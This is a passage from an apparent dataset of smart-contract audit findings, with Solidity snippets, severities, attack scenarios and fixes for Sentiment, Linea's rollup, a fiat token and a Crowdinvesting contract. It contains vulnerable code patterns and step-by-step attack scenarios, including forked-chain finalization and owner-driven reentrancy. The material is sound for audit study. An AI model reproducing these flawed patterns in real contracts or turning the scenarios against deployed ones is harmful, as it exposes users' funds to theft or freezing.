if(amounts[i] > 0)\\n tokensIn[j++] = IStableSwapPool(target).coins(i);\\n unchecked { ++i; }\\n }\\n assembly { mstore(tokensIn, j) }\\n\\n return (true, tokensIn, tokensOut);\\n}\\n```\\n\\nThe `amounts` in Curve controller's `canRemoveLiquidity()` represent the ""Minimum `amounts` of underlying coins to receive"", which is used for slippage control.\\nAt L144-149, only the tokens that specified a minAmount > 0 will be added to the `tokensIn` list, which will later be added to the account's assets list.\\nWe believe this is wrong as regardless of the minAmount `remove_liquidity()` will always receive all the underlying tokens.\\nTherefore, it should not check and only add the token when its minAmount > 
0.","`canRemoveLiquidity()` can be changed to:\\n```\\nfunction canRemoveLiquidity(address target, bytes calldata data)\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n address[] memory tokensOut = new address[](1);\\n tokensOut[0] = target;\\n\\n address[] memory tokensIn = new address[](2);\\n tokensIn[0] = IStableSwapPool(target).coins(0);\\n tokensIn[1] = IStableSwapPool(target).coins(1);\\n return (true, tokensIn, tokensOut);\\n}\\n```\\n\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.","When the user set `_min_amounts` = `0` while removing liquidity from `Curve` and the withdrawn tokens are not in the account's assets list already, the user may get liquidated sooner than expected as `RiskEngine.sol#_getBalance()` only counts in the assets in the assets list.","```\\nfunction canRemoveLiquidity(address target, bytes calldata data)\\n internal\\n view\\n returns (bool, address[] memory, address[] memory)\\n{\\n (,uint256[2] memory amounts) = abi.decode(\\n data[4:],\\n (uint256, uint256[2])\\n );\\n\\n address[] memory tokensOut = new address[](1);\\n tokensOut[0] = target;\\n\\n uint i; uint j;\\n address[] memory tokensIn = new address[](2);\\n while(i < 2) {\\n if(amounts[i] > 0)\\n tokensIn[j++] = IStableSwapPool(target).coins(i);\\n unchecked { ++i; }\\n }\\n assembly { mstore(tokensIn, j) }\\n\\n return (true, tokensIn, tokensOut);\\n}\\n```\\n" +Accounts with ETH loans can not be liquidated if LEther's underlying is set to `address(0)`,medium,"Setting `address(0)` as LEther's `underlying` is allowed, and the logic in `AccountManager#settle()` and `RiskEngine#_valueInWei()` handles `address(0)` specially, which implies that `address(0)` can be an asset.\\nHowever, if LEther's underlying is set to `address(0)`, the accounts with ETH loans will become unable to be liquidated.\\nGiven that at `AccountManager.sol#L100` in `settle()` and `RiskEngine.sol#L186` in `_valueInWei()`, they both 
handled the case that the `asset == address(0)`, and in `Registry.sol#setLToken()`, `underlying == address(0)` is allowed:\\nWe assume that `address(0)` can be set as the `underlying` of `LEther`.\\nIn that case, when the user borrows native tokens, `address(0)` will be added to the user's assets and borrows list.\\n```\\nfunction borrow(address account, address token, uint amt)\\n external\\n whenNotPaused\\n onlyOwner(account)\\n{\\n if (registry.LTokenFor(token) == address(0))\\n revert Errors.LTokenUnavailable();\\n if (!riskEngine.isBorrowAllowed(account, token, amt))\\n revert Errors.RiskThresholdBreached();\\n if (IAccount(account).hasAsset(token) == false)\\n IAccount(account).addAsset(token);\\n if (ILToken(registry.LTokenFor(token)).lendTo(account, amt))\\n IAccount(account).addBorrow(token);\\n emit Borrow(account, msg.sender, token, amt);\\n}\\n```\\n\\nThis will later prevent the user from being liquidated because in `riskEngine.isAccountHealthy()`, it calls `_getBalance()` in a for loop over all the assets, which assumes all the assets comply with `IERC20`. 
Thus, the transaction will revert at L157 when calling `IERC20(address(0)).balanceOf(account)`.\\n```\\nfunction liquidate(address account) external {\\n if (riskEngine.isAccountHealthy(account))\\n revert Errors.AccountNotLiquidatable();\\n _liquidate(account);\\n emit AccountLiquidated(account, registry.ownerFor(account));\\n}\\n```\\n\\n```\\nfunction _getBalance(address account) internal view returns (uint) {\\n address[] memory assets = IAccount(account).getAssets();\\n uint assetsLen = assets.length;\\n uint totalBalance;\\n for(uint i; i < assetsLen; ++i) {\\n totalBalance += _valueInWei(\\n assets[i],\\n IERC20(assets[i]).balanceOf(account)\\n );\\n }\\n return totalBalance + account.balance;\\n}\\n```\\n",Issue Accounts with ETH loans can not be liquidated if LEther's underlying is set to `address(0)`\\nConsider removing the misleading logic in `AccountManager#settle()` and `RiskEngine#_valueInWei()` that handles `address(0)` as an asset;\\nConsider disallowing adding `address(0)` as `underlying` in `setLToken()`.\\nSentiment Team\\nFixed as recommended. PR here.\\nLead Senior Watson\\nConfirmed fix.,"We noticed that in the deployment documentation, LEther is set to init with WETH as the `underlying`. Therefore, this should not be an issue if the system is being deployed correctly.\\n```\\n1. ETH\\n 1. Deploy LEther implementation\\n 2. Deploy Proxy(LEther)\\n 3. call init(WETH), ""LEther"", ""LEth"", IRegistry, reserveFactor)\\n 4. call Registry.setLToken(WETH, Proxy)\\n 5. call accountManager.toggleCollateralStatus(token)\\n 6. 
call Proxy.initDep()\\n```\\n\\nBut considering that setting `address(0)` as LEther's `underlying` is still plausible and the potential damage to the whole protocol is high (all the accounts with ETH loans can not be liquidated), we believe that this should be a medium severity issue.","```\\nfunction borrow(address account, address token, uint amt)\\n external\\n whenNotPaused\\n onlyOwner(account)\\n{\\n if (registry.LTokenFor(token) == address(0))\\n revert Errors.LTokenUnavailable();\\n if (!riskEngine.isBorrowAllowed(account, token, amt))\\n revert Errors.RiskThresholdBreached();\\n if (IAccount(account).hasAsset(token) == false)\\n IAccount(account).addAsset(token);\\n if (ILToken(registry.LTokenFor(token)).lendTo(account, amt))\\n IAccount(account).addBorrow(token);\\n emit Borrow(account, msg.sender, token, amt);\\n}\\n```\\n" +Missing revert keyword,medium,"Missing `revert` keyword in `functionDelegateCall` bypasses an intended safety check, allowing the function to fail silently.\\nIn the helper function `functionDelegateCall`, there is a check to confirm that the target being called is a contract.\\n```\\nif (!isContract(target)) Errors.AddressNotContract;\\n```\\n\\nHowever, there is a typo in the check that is missing the `revert` keyword.\\nAs a result, non-contracts can be submitted as targets, which will cause the delegatecall below to return success (because EVM treats no code as STOP opcode), even though it doesn't do anything.\\n```\\n(bool success, ) = target.delegatecall(data);\\nrequire(success, ""CALL_FAILED"");\\n```\\n",Issue Missing revert keyword\\nAdd missing `revert` keyword to L70 of Helpers.sol.\\n```\\nif (!isContract(target)) revert Errors.AddressNotContract;\\n```\\n\\nSentiment Team\\nFixed as recommended. 
PR here.\\nLead Senior Watson\\nConfirmed fix.,"The code doesn't accomplish its intended goal of checking to confirm that only contracts are passed as targets, so delegatecalls can silently fail.",```\\nif (!isContract(target)) Errors.AddressNotContract;\\n```\\n +No Limit for Minting Amount,high,"In token contract `FiatTokenV1`, there is no limit set for the amount of tokens that can be minted; as a result, the minter can mint unlimited tokens, disrupting the token supply and value.\\n```\\nfunction mint(address to, uint256 amount) public onlyRole(MINTER\\_ROLE) {\\n \\_mint(to, amount);\\n}\\n```\\n",Add a limit for the number of tokens the minter can mint.,,"```\\nfunction mint(address to, uint256 amount) public onlyRole(MINTER\\_ROLE) {\\n \\_mint(to, amount);\\n}\\n```\\n" +Private Key Is Exposed in the Deployment and Upgrade Script,high,"In the contract deploying and upgrading script, the private key is used to broadcast the transaction; this would expose the private key of the deployer and upgrader account on the machine running the script, therefore compromising these accounts.\\n```\\nuint256 deployerPrivateKey = vm.envUint(""PRIVATE\\_KEY"");\\n```\\n\\n```\\nuint256 deployerPrivateKey = vm.envUint(""PRIVATE\\_KEY"");\\nvm.startBroadcast(deployerPrivateKey);\\n```\\n","Have Forge send a raw transaction to the cold wallet of the account; the wallet signs the transaction and then returns the signed transaction to Forge and the broadcaster. Alternatively, use a different wallet for deployment and upgrade and stop using the wallet after the script is complete",,"```\\nuint256 deployerPrivateKey = vm.envUint(""PRIVATE\\_KEY"");\\n```\\n" +Critical Functions Are Public and Without Access Control,medium,"Critical functions in RescuableV1(rescue) and `BlacklistableV1` `(blacklist,unblacklist)` are public and unauthenticated; anyone can call these functions to steal funds and blacklist other accounts. 
Although the child contract `FiatTokenV1` has authenticated the overridden functions and protected them from public access, other contracts inheriting `RescuableV1` and `BlacklistableV1` might have risks from the unauthenticated public functions\\n```\\nfunction rescue(IERC20 token, address to, uint256 amount) public virtual {\\n```\\n\\n```\\nfunction blacklist(address account) public virtual {\\n \\_blacklisted[account] = true;\\n emit Blacklisted(account);\\n}\\n\\n/\\*\\*\\n \\* @dev Removes account from blacklist\\n \\* @param account The address to remove from the blacklist\\n \\*/\\nfunction unBlacklist(address account) public virtual {\\n \\_blacklisted[account] = false;\\n emit UnBlacklisted(account);\\n}\\n```\\n",Make these functions internal and in the child contract add correspondent public function with authentication to call the inherited functions,,"```\\nfunction rescue(IERC20 token, address to, uint256 amount) public virtual {\\n```\\n" +Unecessary Parent Contracts,low,"Contract `BlacklistableV1` and `RescuableV1` extends `ContextUpgradeable` and `ERC20Upgradeable,` which are not used in any of contract functions and are already inherited by the child contract `FiatTokenV1`.\\n```\\nabstract contract BlacklistableV1 is Initializable, ContextUpgradeable, ERC20Upgradeable {\\n```\\n\\n```\\nabstract contract RescuableV1 is Initializable, ContextUpgradeable, ERC20Upgradeable {\\n```\\n\\n```\\ncontract FiatTokenV1 is\\n Initializable,\\n ERC20Upgradeable,\\n ERC20PausableUpgradeable,\\n ERC20BurnableUpgradeable,\\n AccessControlUpgradeable,\\n ERC20PermitUpgradeable,\\n UUPSUpgradeable,\\n BlacklistableV1,\\n RescuableV1\\n{\\n```\\n",Remove the unnecessary parent contracts,,"```\\nabstract contract BlacklistableV1 is Initializable, ContextUpgradeable, ERC20Upgradeable {\\n```\\n" +Redundant _disableInitializers in Constructor,low,"Contract `FiatTokenV1` inherits from contracts `BlacklistableV1` and `RescuableV1`, the two parent contracts both have 
`_disableInitializers` in their constructors to prevent uninitialized contract being initialized by the attackers, it's not necessary to have `_disableInitializers` in the FiatTokenV1's constructor, which is redundant and inefficient.\\n```\\nconstructor() {\\n \\_disableInitializers();\\n}\\n```\\n",Remove constructor from `FiatTokenV1`,,```\\nconstructor() {\\n \\_disableInitializers();\\n}\\n```\\n +Incorrect Final Block Number Can Be Finalized,high,"In the data finalization function `finalizeCompressedBlocksWithProof`, `finalizationData.finalBlockNumber` is the final block number of the compressed block data to be finalized. However, there is no check in the contract or the prover to ensure `finalBlockNumber` is correct when there is no new data submitted in the finalization, i.e., `submissionDataLength == 0` . The prover can submit an incorrect final block number and, as a result, the finalized block number (currentL2BlockNumber) would be incorrect. Consequently, the prover can skip block data in the finalization.\\n```\\ncurrentL2BlockNumber = \\_finalizationData.finalBlockNumber;\\n```\\n\\n```\\nif (stateRootHashes[currentL2BlockNumber] != \\_finalizationData.parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n}\\n```\\n","Resolution\\nfixed by adding a recommended check of `finalBlockNumber` matching the last block number of the submitted data in `_finalizeCompressedBlocks` and a check in the prover and adding `finalBlockNumber` and `lastFinalizedBlockNumber` in the public input of the verifier in the finalization in PR-24\\nIn `_finalizeCompressedBlocks`, check if `finalBlockNumber` is equal to the last block number (finalBlockInData) of the last item of submitted block data. 
Another solution is to have the prover show that finalBlockNumberis correct in the proof by providing the last finalized block number (lastFinalizedBlockNumber) and verify it by adding `finalBlockNumber` and `lastFinalizedBlockNumber` in the public input of the verifier in the finalization.",,```\\ncurrentL2BlockNumber = \\_finalizationData.finalBlockNumber;\\n```\\n +Finalization Fails for the First Batch of Data Submitted After Migration to the Updated Contract,high,"When submitting the initial batch of compressed block data after the contract update, the finalization will fail.\\nIn function `_finalizeCompressedBlocks`, `startingDataParentHash = dataParents[_finalizationData.dataHashes[0]]` will be empty and, therefore, `startingParentFinalStateRootHash = dataFinalStateRootHashes[startingDataParentHash]` will be empty too. The check `_finalizationData.parentStateRootHash == stateRootHashes[currentL2BlockNumber]` requires `_finalizationData.parentStateRootHash == _initialStateRootHash`, which is not empty, so the condition `startingParentFinalStateRootHash != _finalizationData.parentStateRootHash` is true, and we revert with the error FinalStateRootHashDoesNotMatch:\\n```\\nif (stateRootHashes[currentL2BlockNumber] != \\_finalizationData.parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n}\\n```\\n\\n```\\nif (finalizationDataDataHashesLength != 0) {\\n bytes32 startingDataParentHash = dataParents[\\_finalizationData.dataHashes[0]];\\n\\n if (startingDataParentHash != \\_finalizationData.dataParentHash) {\\n revert ParentHashesDoesNotMatch(startingDataParentHash, \\_finalizationData.dataParentHash);\\n }\\n\\n bytes32 startingParentFinalStateRootHash = dataFinalStateRootHashes[startingDataParentHash];\\n\\n if (startingParentFinalStateRootHash != \\_finalizationData.parentStateRootHash) {\\n revert FinalStateRootHashDoesNotMatch(startingParentFinalStateRootHash, \\_finalizationData.parentStateRootHash);\\n }\\n```\\n",Set the correct initial value 
for `dataFinalStateRootHashes` for the initial batch of compressed block data.,,```\\nif (stateRootHashes[currentL2BlockNumber] != \\_finalizationData.parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n}\\n```\\n +Prover Can Censor L2 → L1 Messages Partially Addressed,high,"In L2 → L1 messaging, messages are grouped and added to a Merkle tree by the prover. During finalization, the operator (coordinator) submits the Merkle root to L1, and the user SDK rebuilds the tree to which the message is added and generates a Merkle proof to claim against the root finalized on L1. However, the prover can skip messages when building the tree. Consequently, the user cannot claim the skipped message, which might result in frozen funds.\\nCurrently, the prover is a single entity owned by Linea. Hence, this would require malice or negligence on Linea's part.\\n```\\n\\_addL2MerkleRoots(\\_finalizationData.l2MerkleRoots, \\_finalizationData.l2MerkleTreesDepth);\\n\\_anchorL2MessagingBlocks(\\_finalizationData.l2MessagingBlocksOffsets, lastFinalizedBlock);\\n```\\n","Decentralize the prover, so messages can be included by different provers.",,"```\\n\\_addL2MerkleRoots(\\_finalizationData.l2MerkleRoots, \\_finalizationData.l2MerkleTreesDepth);\\n\\_anchorL2MessagingBlocks(\\_finalizationData.l2MessagingBlocksOffsets, lastFinalizedBlock);\\n```\\n" +Malicious Operator Might Finalize Data From a Forked Linea Chain,high,"A malicious operator (prover) can add and finalize block data from a forked Linea chain, so transactions on the forked chain can be finalized, causing a loss of funds from the L1.\\nFor example, a malicious operator forks the canonical chain, then the attacker sends the forked chain Ether to L1 with `sendMessage` from the forked L2. The operator then submits the block data to L1 and finalizes it with `finalizeCompressedBlocksWithProof`, using the finalization data and proof from the forked chain. 
(Note that the malicious prover sets the forked chain `chainId` in its circuit as a constant.) The L1 contract (LineaRollup) doesn't know whether the data and the proof are from the canonical L2 or the forked one. The finalization succeeds, and the attacker can claim the bridged forked chain Ether and steal funds from L1.\\nAs there is currently only one operator and it is owned by the Linea team, this kind of attack is unlikely to happen. However, when the operator and the coordinator are decentralized, the likelihood of this attack increases.\\n```\\nuint256 publicInput = uint256(\\n keccak256(\\n abi.encode(\\n shnarf,\\n \\_finalizationData.parentStateRootHash,\\n \\_finalizationData.lastFinalizedTimestamp,\\n \\_finalizationData.finalBlockNumber,\\n \\_finalizationData.finalTimestamp,\\n \\_finalizationData.l1RollingHash,\\n \\_finalizationData.l1RollingHashMessageNumber,\\n keccak256(abi.encodePacked(\\_finalizationData.l2MerkleRoots))\\n )\\n```\\n\\n```\\n\\_addL2MerkleRoots(\\_finalizationData.l2MerkleRoots, \\_finalizationData.l2MerkleTreesDepth);\\n```\\n","Add `chainId` in the `FinalizationData` as a public input of the verifier function `_verifyProof`, so the proof from the forked Linea chain will not pass the verification because the `chainId` won't match.",,"```\\nuint256 publicInput = uint256(\\n keccak256(\\n abi.encode(\\n shnarf,\\n \\_finalizationData.parentStateRootHash,\\n \\_finalizationData.lastFinalizedTimestamp,\\n \\_finalizationData.finalBlockNumber,\\n \\_finalizationData.finalTimestamp,\\n \\_finalizationData.l1RollingHash,\\n \\_finalizationData.l1RollingHashMessageNumber,\\n keccak256(abi.encodePacked(\\_finalizationData.l2MerkleRoots))\\n )\\n```\\n" +The Compressed Block Data Is Not Verified Against Data in the Prover During Data Submission Acknowledged,medium,"When the sequencer submits the batched block data with the `submitData` function, it's expected to check that the submitted commitment of the compressed block data 
`keccak(_submissionData.compressedData)` and the commitment of the block data used in the prover (snarkHash) commit to the same data. This is done by proof of equivalence; the `x` is calculated by hashing `keccak(_submissionData.compressedData)` and `snarkHash`, and `y` is provided by the prover. Then it's verified that `P(x) = y`, where `P` is a polynomial that encodes the compressed data (_submissionData.compressedData). However, in the `submitData` function, `y` is evaluated by `_calculateY` but it is not checked against the `y` provided by the prover. In fact, the prover doesn't provide `y` to the function; instead `x` and `y` are provided to the prover who would evaluate `y'` and compare it with `y` from the contract, then `x` and `y` are included in the public input for the proof verification in the finalization.\\n```\\nshnarf = keccak256(\\n abi.encode(\\n shnarf,\\n _submissionData.snarkHash,\\n _submissionData.finalStateRootHash,\\n compressedDataComputedX,\\n _calculateY(_submissionData.compressedData, compressedDataComputedX)\\n )\\n ); \\n```\\n\\nThe only difference is if the two commitments don't commit to the same block data (meaning the data submitted doesn't match the data used in the prover), `submitData` would fail - while in the current implementation, it would fail in the proof verification during the finalization. As a result, if the data submitted doesn't match the data in the prover in the finalization, the operator has to submit the correct data again in order to finalize it. 
Linea stated they will verify it in the data submission, once EIP-4844 is implemented.\\n```\\nfunction \\_submitData(SubmissionData calldata \\_submissionData) internal returns (bytes32 shnarf) {\\n shnarf = dataShnarfHashes[\\_submissionData.dataParentHash];\\n\\n bytes32 parentFinalStateRootHash = dataFinalStateRootHashes[\\_submissionData.dataParentHash];\\n uint256 lastFinalizedBlock = currentL2BlockNumber;\\n\\n if (\\_submissionData.firstBlockInData <= lastFinalizedBlock) {\\n revert FirstBlockLessThanOrEqualToLastFinalizedBlock(\\_submissionData.firstBlockInData, lastFinalizedBlock);\\n }\\n\\n if (\\_submissionData.firstBlockInData > \\_submissionData.finalBlockInData) {\\n revert FirstBlockGreaterThanFinalBlock(\\_submissionData.firstBlockInData, \\_submissionData.finalBlockInData);\\n }\\n\\n if (\\_submissionData.parentStateRootHash != parentFinalStateRootHash) {\\n revert StateRootHashInvalid(parentFinalStateRootHash, \\_submissionData.parentStateRootHash);\\n }\\n\\n bytes32 currentDataHash = keccak256(\\_submissionData.compressedData);\\n\\n if (dataFinalStateRootHashes[currentDataHash] != EMPTY\\_HASH) {\\n revert DataAlreadySubmitted(currentDataHash);\\n }\\n\\n dataParents[currentDataHash] = \\_submissionData.dataParentHash;\\n dataFinalStateRootHashes[currentDataHash] = \\_submissionData.finalStateRootHash;\\n\\n bytes32 compressedDataComputedX = keccak256(abi.encode(\\_submissionData.snarkHash, currentDataHash));\\n\\n shnarf = keccak256(\\n abi.encode(\\n shnarf,\\n \\_submissionData.snarkHash,\\n \\_submissionData.finalStateRootHash,\\n compressedDataComputedX,\\n \\_calculateY(\\_submissionData.compressedData, compressedDataComputedX)\\n )\\n );\\n\\n dataShnarfHashes[currentDataHash] = shnarf;\\n\\n emit DataSubmitted(currentDataHash, \\_submissionData.firstBlockInData, \\_submissionData.finalBlockInData);\\n}\\n```\\n\\n```\\nfunction \\_calculateY(\\n bytes calldata \\_data,\\n bytes32 \\_compressedDataComputedX\\n) internal pure returns 
(bytes32 compressedDataComputedY) {\\n if (\\_data.length % 0x20 != 0) {\\n revert BytesLengthNotMultipleOf32();\\n }\\n\\n bytes4 errorSelector = ILineaRollup.FirstByteIsNotZero.selector;\\n assembly {\\n for {\\n let i := \\_data.length\\n } gt(i, 0) {\\n\\n } {\\n i := sub(i, 0x20)\\n let chunk := calldataload(add(\\_data.offset, i))\\n if iszero(iszero(and(chunk, 0xFF00000000000000000000000000000000000000000000000000000000000000))) {\\n let ptr := mload(0x40)\\n mstore(ptr, errorSelector)\\n revert(ptr, 0x4)\\n }\\n compressedDataComputedY := addmod(\\n mulmod(compressedDataComputedY, \\_compressedDataComputedX, Y\\_MODULUS),\\n chunk,\\n Y\\_MODULUS\\n )\\n }\\n }\\n}\\n```\\n",Add the compressed block data verification in the `submitData` function.,,"```\\nshnarf = keccak256(\\n abi.encode(\\n shnarf,\\n _submissionData.snarkHash,\\n _submissionData.finalStateRootHash,\\n compressedDataComputedX,\\n _calculateY(_submissionData.compressedData, compressedDataComputedX)\\n )\\n ); \\n```\\n" +Empty Compressed Data Allowed in Data Submission,medium,"In `submitData`, the coordinator can submit data with empty `compressedData` in `_submissionData`, which is not a desired purpose of this function and may cause undefined system behavior.\\n```\\nfunction submitData(\\n SubmissionData calldata \\_submissionData\\n)\\n external\\n whenTypeNotPaused(PROVING\\_SYSTEM\\_PAUSE\\_TYPE)\\n whenTypeNotPaused(GENERAL\\_PAUSE\\_TYPE)\\n onlyRole(OPERATOR\\_ROLE)\\n{\\n \\_submitData(\\_submissionData);\\n}\\n```\\n",Add a check to disallow data submission with empty `compressedData`.,,```\\nfunction submitData(\\n SubmissionData calldata \\_submissionData\\n)\\n external\\n whenTypeNotPaused(PROVING\\_SYSTEM\\_PAUSE\\_TYPE)\\n whenTypeNotPaused(GENERAL\\_PAUSE\\_TYPE)\\n onlyRole(OPERATOR\\_ROLE)\\n{\\n \\_submitData(\\_submissionData);\\n}\\n```\\n +Limiting the Price in the buy and onTokenTransfer Functions,medium,"When an investor tries to `buy` the tokens in the 
`Crowdinvesting` contract, the `buy` function does not allow to limit the amount of tokens that can be spent during this particular transaction:\\n```\\nfunction buy(uint256 \\_amount, address \\_tokenReceiver) public whenNotPaused nonReentrant {\\n // rounding up to the next whole number. Investor is charged up to one currency bit more in case of a fractional currency bit.\\n uint256 currencyAmount = Math.ceilDiv(\\_amount \\* getPrice(), 10 \\*\\* token.decimals());\\n```\\n\\nThe owner of the price oracle can front-run the transaction and twist the price.\\nOf course, the buyer can try to regulate that limit with the token allowance, but there may be some exceptions. Sometimes, users want to give more allowance and buy in multiple transactions over time. Or even give an infinite allowance (not recommended) out of convenience.\\nThe same issue can be found in the `onTokenTransfer` function. This function works differently because the amount of currency is fixed, and the amount of tokens minted is undefined. Because of that, limiting the allowance won't help, so the user doesn't know how many tokens can be bought.",It's recommended to explicitly limit the amount of tokens that can be transferred from the buyer for the `buy` function. And allow users to define a minimal amount of tokens bought in the `onTokenTransfer` function.,,"```\\nfunction buy(uint256 \\_amount, address \\_tokenReceiver) public whenNotPaused nonReentrant {\\n // rounding up to the next whole number. 
Investor is charged up to one currency bit more in case of a fractional currency bit.\\n uint256 currencyAmount = Math.ceilDiv(\\_amount \\* getPrice(), 10 \\*\\* token.decimals());\\n```\\n" +Potential Re-Entrancy Attack in the Crowdinvesting Contract,low,"The attack requires a set of pre-requisites:\\nThe currency token should have a re-entrancy opportunity inside the token transfer.\\nThe re-entrancy can be done on a token transfer from the `_msgSender()` to the `feeCollector`, so there are not a lot of attackers who can potentially execute it.\\nThe owner should be involved in the attack, so it's most likely an attack by the owner.\\n```\\nfunction buy(uint256 \\_amount, address \\_tokenReceiver) public whenNotPaused nonReentrant {\\n // rounding up to the next whole number. Investor is charged up to one currency bit more in case of a fractional currency bit.\\n uint256 currencyAmount = Math.ceilDiv(\\_amount \\* getPrice(), 10 \\*\\* token.decimals());\\n\\n (uint256 fee, address feeCollector) = \\_getFeeAndFeeReceiver(currencyAmount);\\n if (fee != 0) {\\n currency.safeTransferFrom(\\_msgSender(), feeCollector, fee);\\n }\\n\\n currency.safeTransferFrom(\\_msgSender(), currencyReceiver, currencyAmount - fee);\\n \\_checkAndDeliver(\\_amount, \\_tokenReceiver);\\n\\n emit TokensBought(\\_msgSender(), \\_amount, currencyAmount);\\n}\\n```\\n\\nSo on the token transfer to the `feeCollector` above, the `currency` parameter can be changed by the `owner`. And the following token transfer (currency.safeTransferFrom(_msgSender(), currencyReceiver, currencyAmount - fee);) will be made in a different `currency`.\\nA possible scenario of the attack could look as follows:\\nMalicious owner sells tokens for a valuable currency. 
People are placing allowance for the tokens.\\nThe owner changes the currency to a new one with a much lower price and re-entrancy during transfer.\\nWhen a victim wants to buy tokens, the owner reenters on fee transfer and returns the old currency.\\nThe victim transfers the updated currency that is more expensive.",Save the currency in memory at the beginning of the function and use it further.,,"```\\nfunction buy(uint256 \\_amount, address \\_tokenReceiver) public whenNotPaused nonReentrant {\\n // rounding up to the next whole number. Investor is charged up to one currency bit more in case of a fractional currency bit.\\n uint256 currencyAmount = Math.ceilDiv(\\_amount \\* getPrice(), 10 \\*\\* token.decimals());\\n\\n (uint256 fee, address feeCollector) = \\_getFeeAndFeeReceiver(currencyAmount);\\n if (fee != 0) {\\n currency.safeTransferFrom(\\_msgSender(), feeCollector, fee);\\n }\\n\\n currency.safeTransferFrom(\\_msgSender(), currencyReceiver, currencyAmount - fee);\\n \\_checkAndDeliver(\\_amount, \\_tokenReceiver);\\n\\n emit TokensBought(\\_msgSender(), \\_amount, currencyAmount);\\n}\\n```\\n" +Lack of Validation of PrivateOffer Initialization Parameters,low,"The `PrivateOffer` contract allows to create a customised deal for a specific investor. The `initialize()` function receives parameters to set up the `PrivateOffer` accordingly.\\nThe following parameters lack of validation during initialization:\\n`tokenAmount`\\n`token`\\n`currency`\\n`tokenAmount`\\n```\\nuint256 currencyAmount = Math.ceilDiv(\\n \\_arguments.tokenAmount \\* \\_arguments.tokenPrice,\\n 10 \\*\\* \\_arguments.token.decimals()\\n);\\n```\\n\\n`tokenAmount` is not validated at all. It should be verified to be greater than zero.\\n`token`\\n`token` is not validated at all. It should be verified to be different than zero address.\\n`currency`\\n`currency` is not validated at all. The documentation mentions a restricted list of supported currencies. 
It should be enforced by checking this parameter against a whitelist of `currency` addresses.","Enhance the validation of the following parameters: `tokenAmount`, `token`, `currency`.",,"```\\nuint256 currencyAmount = Math.ceilDiv(\\n \\_arguments.tokenAmount \\* \\_arguments.tokenPrice,\\n 10 \\*\\* \\_arguments.token.decimals()\\n);\\n```\\n" +Lack of Validation of Crowdinvesting Initialization Parameters,low,"The `Crowdinvesting` contract allows everyone who meets the requirements to buy tokens at a fixed price. The `initialize()` function receives parameters to set up the `Crowdinvesting` accordingly.\\nThe following parameters lack of validation during initialization:\\n`tokenPrice`\\n`minAmountPerBuyer`\\n`lastBuyDate`\\n`currency`\\n`tokenPrice`\\n```\\nrequire(\\_arguments.tokenPrice != 0, ""\\_tokenPrice needs to be a non-zero amount"");\\n```\\n\\n`tokenPrice` is checked to be different to zero. It should be verified to be in between `priceMin` and `priceMax` when these parameters are provided.\\n`minAmountPerBuyer`\\n```\\nrequire(\\n \\_arguments.minAmountPerBuyer <= \\_arguments.maxAmountPerBuyer,\\n ""\\_minAmountPerBuyer needs to be smaller or equal to \\_maxAmountPerBuyer""\\n);\\n```\\n\\n`minAmountPerBuyer` is checked to be below or equal to `maxAmountPerBuyer`. It should be verified to not be zero.\\n`lastBuyDate`\\n```\\nlastBuyDate = \\_arguments.lastBuyDate;\\n```\\n\\n`lastBuyDate` is not validated at all. It should be verified to be greater than the current `block.timestamp`. 
Currently, a `Crowdinvesting` contract with `lastBuyDate` parameter set to a value (different than zero) below `block.timestamp` will not be able to sell any token.\\n```\\nfunction \\_checkAndDeliver(uint256 \\_amount, address \\_tokenReceiver) internal {\\n require(tokensSold + \\_amount <= maxAmountOfTokenToBeSold, ""Not enough tokens to sell left"");\\n require(tokensBought[\\_tokenReceiver] + \\_amount >= minAmountPerBuyer, ""Buyer needs to buy at least minAmount"");\\n require(\\n tokensBought[\\_tokenReceiver] + \\_amount <= maxAmountPerBuyer,\\n ""Total amount of bought tokens needs to be lower than or equal to maxAmount""\\n );\\n\\n if (lastBuyDate != 0 && block.timestamp > lastBuyDate) {\\n revert(""Last buy date has passed: not selling tokens anymore."");\\n }\\n\\n tokensSold += \\_amount;\\n tokensBought[\\_tokenReceiver] += \\_amount;\\n\\n token.mint(\\_tokenReceiver, \\_amount);\\n}\\n```\\n\\n`currency`\\n```\\nrequire(address(\\_arguments.currency) != address(0), ""currency can not be zero address"");\\n```\\n\\n`currency` is checked to be different than zero. The documentation mentions a restricted list of supported currencies. 
It should be enforced by checking this parameter against a whitelist of `currency` addresses.","Enhance the validation of the following parameters: `tokenPrice`, `tokenPrice`, `lastBuyDate`, `currency`.",,"```\\nrequire(\\_arguments.tokenPrice != 0, ""\\_tokenPrice needs to be a non-zero amount"");\\n```\\n" +Missing Events on Important State Changes,medium,"Throughout the code base, various important settings-related state changes are not surfaced by events.\\nIn RocketDAONodeTrusted:\\n```\\nfunction bootstrapMember(string memory _id, string memory _url, address _nodeAddress) override external onlyGuardian onlyBootstrapMode onlyRegisteredNode(_nodeAddress) onlyLatestContract(""rocketDAONodeTrusted"", address(this)) {\\n // Ok good to go, lets add them\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(""rocketDAONodeTrustedProposals"")).proposalInvite(_id, _url, _nodeAddress);\\n}\\n\\n\\n// Bootstrap mode - Uint Setting\\nfunction bootstrapSettingUint(string memory _settingContractName, string memory _settingPath, uint256 _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAONodeTrusted"", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(""rocketDAONodeTrustedProposals"")).proposalSettingUint(_settingContractName, _settingPath, _value);\\n}\\n\\n// Bootstrap mode - Bool Setting\\nfunction bootstrapSettingBool(string memory _settingContractName, string memory _settingPath, bool _value) override external onlyGuardian onlyBootstrapMode onlyLatestContract(""rocketDAONodeTrusted"", address(this)) {\\n // Ok good to go, lets update the settings\\n RocketDAONodeTrustedProposalsInterface(getContractAddress(""rocketDAONodeTrustedProposals"")).proposalSettingBool(_settingContractName, _settingPath, _value);\\n}\\n```\\n\\nIn RocketDAOProtocol:\\n```\\nfunction bootstrapSettingMulti(string[] memory _settingContractNames, string[] memory _settingPaths, 
